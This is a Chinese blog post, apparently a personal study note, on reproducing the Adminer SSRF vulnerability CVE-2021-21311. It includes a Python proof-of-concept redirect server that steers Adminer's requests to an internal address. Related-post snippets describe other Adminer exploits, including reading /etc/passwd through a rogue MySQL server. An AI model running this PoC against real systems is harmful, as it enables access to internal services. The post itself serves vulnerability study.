Adminer-CVE-2021-21311

于 2024-07-14 10:30:12 发布
阅读量133 收藏
点赞数 1
文章标签: 学习 笔记 网络 网络协议 tcp/ip python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60894143/article/details/140413303
版权

在其4.0.04.7.9版本之间,连接 ElasticSearch ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。

VPS开启HTTP服务

VPS 开启HTTP 再同时跑POC

确保能访问poc里的链接文件

第一是目标地址

第二个是跳转地址

第三个是监听地址

如果想切换监听端口

poc:

import SimpleHTTPServer
import SocketServer

def redirect_handler_factory(url):

    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
       def do_GET(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

    return RedirectHandler


def main():

    redirectHandler = redirect_handler_factory("http://192.168.62.143:8000/1.txt")

    handler = SocketServer.TCPServer(("", 80), redirectHandler)
    print("serving at port 80")
    handler.serve_forever()

if __name__ == "__main__":
    main()

C9ccc00
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DB Adminer-navicat资源
07-01
WEBWEB Navicat
adminer-PHP
06-20
<p>Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的...
CVE-2021-21311复现学习
shierbai的博客
05-20 554
如图在物理机(不属于上述任何一个ip)输入要访问的主机及其端口(这里这个ip就是在环境中属于内网我们无法直接访问到的那个服务器,而通过ssrf可以让我们伪造另一个服务端去发送请求来返回我们想要的数据),可以看到在139端显示这个请求是由138发出的,而不是自己的ip,这样就完成了ssrf,不过在利用上博主还不太能够善用。adminer版本是4.7.8,是php编写的数据库管理工具,存在漏洞CVE-2021-21311,它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。
vulhub中Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞复现(CVE-2021-21311
yougexiaojiuguan的博客
02-03 975
漏洞复现过程的记录,为了方便自己以后查看
HTB-AdmirerToo
qq_53142368的博客
07-12 1955
HTB
vulhub中Adminer远程文件读取漏洞复现(CVE-2021-43008)
yougexiaojiuguan的博客
02-03 1145
漏洞复现过程的记录,也是为了方便自己查看
CVE-2021-43008复现学习
shierbai的博客
05-20 254
1.使用[mysql-fake-server]启动一个恶意的MySQL服务器。在Adminer登录页面中填写恶意服务地址和用户名`fileread_/etc/passwd。在adminer出输入恶意ip和用户名,这个脚本是根据输入用户名来返回读取文件的,如果你输win那就是读取/windows。注意,python版本需要在3.4-3.6之间,否则需要对脚本进行修改。文件会读取到fileOutput文件夹下。我是win10,64位。
CVE-2021-43008 vulhub 环境利用复现
ldl345的博客
06-07 302
LOAD DATA INFILE作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会快速读取本地文件到数据库,又因为攻击者已经操控了这个数据库,所以先读取本地文件到数据库,再在第四步中对数据库文件进行查看。1.为了应用此漏洞,攻击者需求拜访 Adminer 的登录页面并操控的 MySQL 数据库:就是说攻击者已经得到了这个数据的账号和密码,能够用Adminer远程连接。这个工具,我直接下载的gui的jar版本。
VulnHub-DevGuru: 1
热门推荐
江左盟的博客
08-06 1万+
信息收集 使用Nmap扫描目标主机发现目标主机开启22,80和8585端口,分别运行着OpenSSH 7.6p1服务,Apache httpd 2.4.29服务和git存储库,且服务器80端口存在.git目录,操作系统为Ubuntu,如图: 利用GitHack将源码下载到本地,如图: 查看README.md文件发现该网站使用October CMS,查看config/database.php文件发现MySQL数据库:octoberdb,用...
烽火狼烟丨PHP远程代码执行漏洞(CVE-2022-31625、CVE-2022-31626)风险提示
C20220511的博客
06-13 2767
1、漏洞概述近日,WebRAY安全服务产品线监测到PHP 官方发布了关于PHP存在远程代码执行漏洞的漏洞通告,漏洞编号分别为:CVE-2022-31625、CVE-2022-31626。
[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-30 656
触发原因:preg_replace函数引发的 触发原理:preg_replace漏洞触发有两个前提: 01:第一个参数需要e标识符,有了它可以执行第二个参数的命令 02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令,举个例子: 影响漏洞版本: 漏洞复现: 1、docker搭建 docker-compose up -d 2、漏洞利用代码:python php...
adminer-4.7.7_Adminer_MYSQL_php_
09-28
"mysql类数据库管理工具adminer-4.7.7最新版" 描述了这个文件是一个用于MySQL数据库的管理工具,具体来说是Adminer的4.7.7版本,被描述为“最新版”,这暗示用户将获得最新的特性和安全更新。Adminer作为一个数据库...
adminer-clean-skin:为管理员清理主题
02-18
"adminer-clean-skin" 是一个针对 Adminer 数据库管理工具的定制化主题,旨在提供一个简洁、干净的用户界面,优化管理员的使用体验。"clean skin" 意味着该主题可能去除了不必要的元素,使界面更加整洁,减少干扰。 ...
adminer-4.6.3
08-02
Adminers支持多语言(已自带11种翻译语言文件,可以按自己的需求翻译相应的语言)....提供的功能包括:1:创建,修改,删除索引/外键/视图/存储过程和函数.2:查询,合计,排序数据.3:新增/修改/删除记录.4:支持所有数据类型,包括...
Lumos学习王佩丰Excel第四讲:排序与选择
Sunshine_XX的博客
07-10 343
自定义排序演示:工资条拆分的演示:如果遇到很长的表,标题只存在于顶端,打印出来观感不好,可以这样做:有些版本的excel复制筛选数据容易把背后隐藏的所有数据都复制上去,这时可选中定位条件的“可见单元格”选项,复制粘贴即可。并排表示且,错排表示或。ctrl+shift+↓+→全选,演示说明:回头学原理,先记住一句话,要想筛选对,条件表头不要对。
Autoware.universe 高效学习第三章 -- 智驾技术务虚会之智驾技术栈讨论 其一
cy1641395022的博客
07-10 676
Autoware.universe 高效学习第三章 -- 智驾技术务虚会之智驾技术栈讨论 其一
ROS基础学习-ROS运行管理
周陽讀書
07-11 739
ROS运行管理。
Python 学习中什么是异常处理,如何使用 try、except、finally ?
最新发布
Itmastergo的博客
07-12 682
异常是程序执行过程中发生的非正常事件,这些事件会中断正常的程序指令流。当程序遇到错误时,Python 会抛出一个异常对象,异常对象包含了错误的类型和相关的信息。
CVE-2022-31625
09-02
CVE-2022-31625是PHP中的一个远程代码执行漏洞。这个漏洞是由于PHP_FUNCTION中分配在堆上的数组清除不及时导致的。攻击者可以通过错误地再次调用php_pgsql_free_params()函数,并使用之前未及时清除的数组值,从而实现远程代码执行。这个漏洞可能影响基于PHP的数据库管理软件,例如Adminer和PHPmyAdmin。为了防止此漏洞的利用,建议及时升级到修复了该漏洞的PHP版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [烽火狼烟丨PHP远程代码执行漏洞(CVE-2022-31625、CVE-2022-31626)风险提示](https://blog.csdn.net/C20220511/article/details/125258528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [【安全要闻】PHP多个远程代码执行漏洞风险预警](https://blog.csdn.net/qzt961003/article/details/125317187)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C9ccc00

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值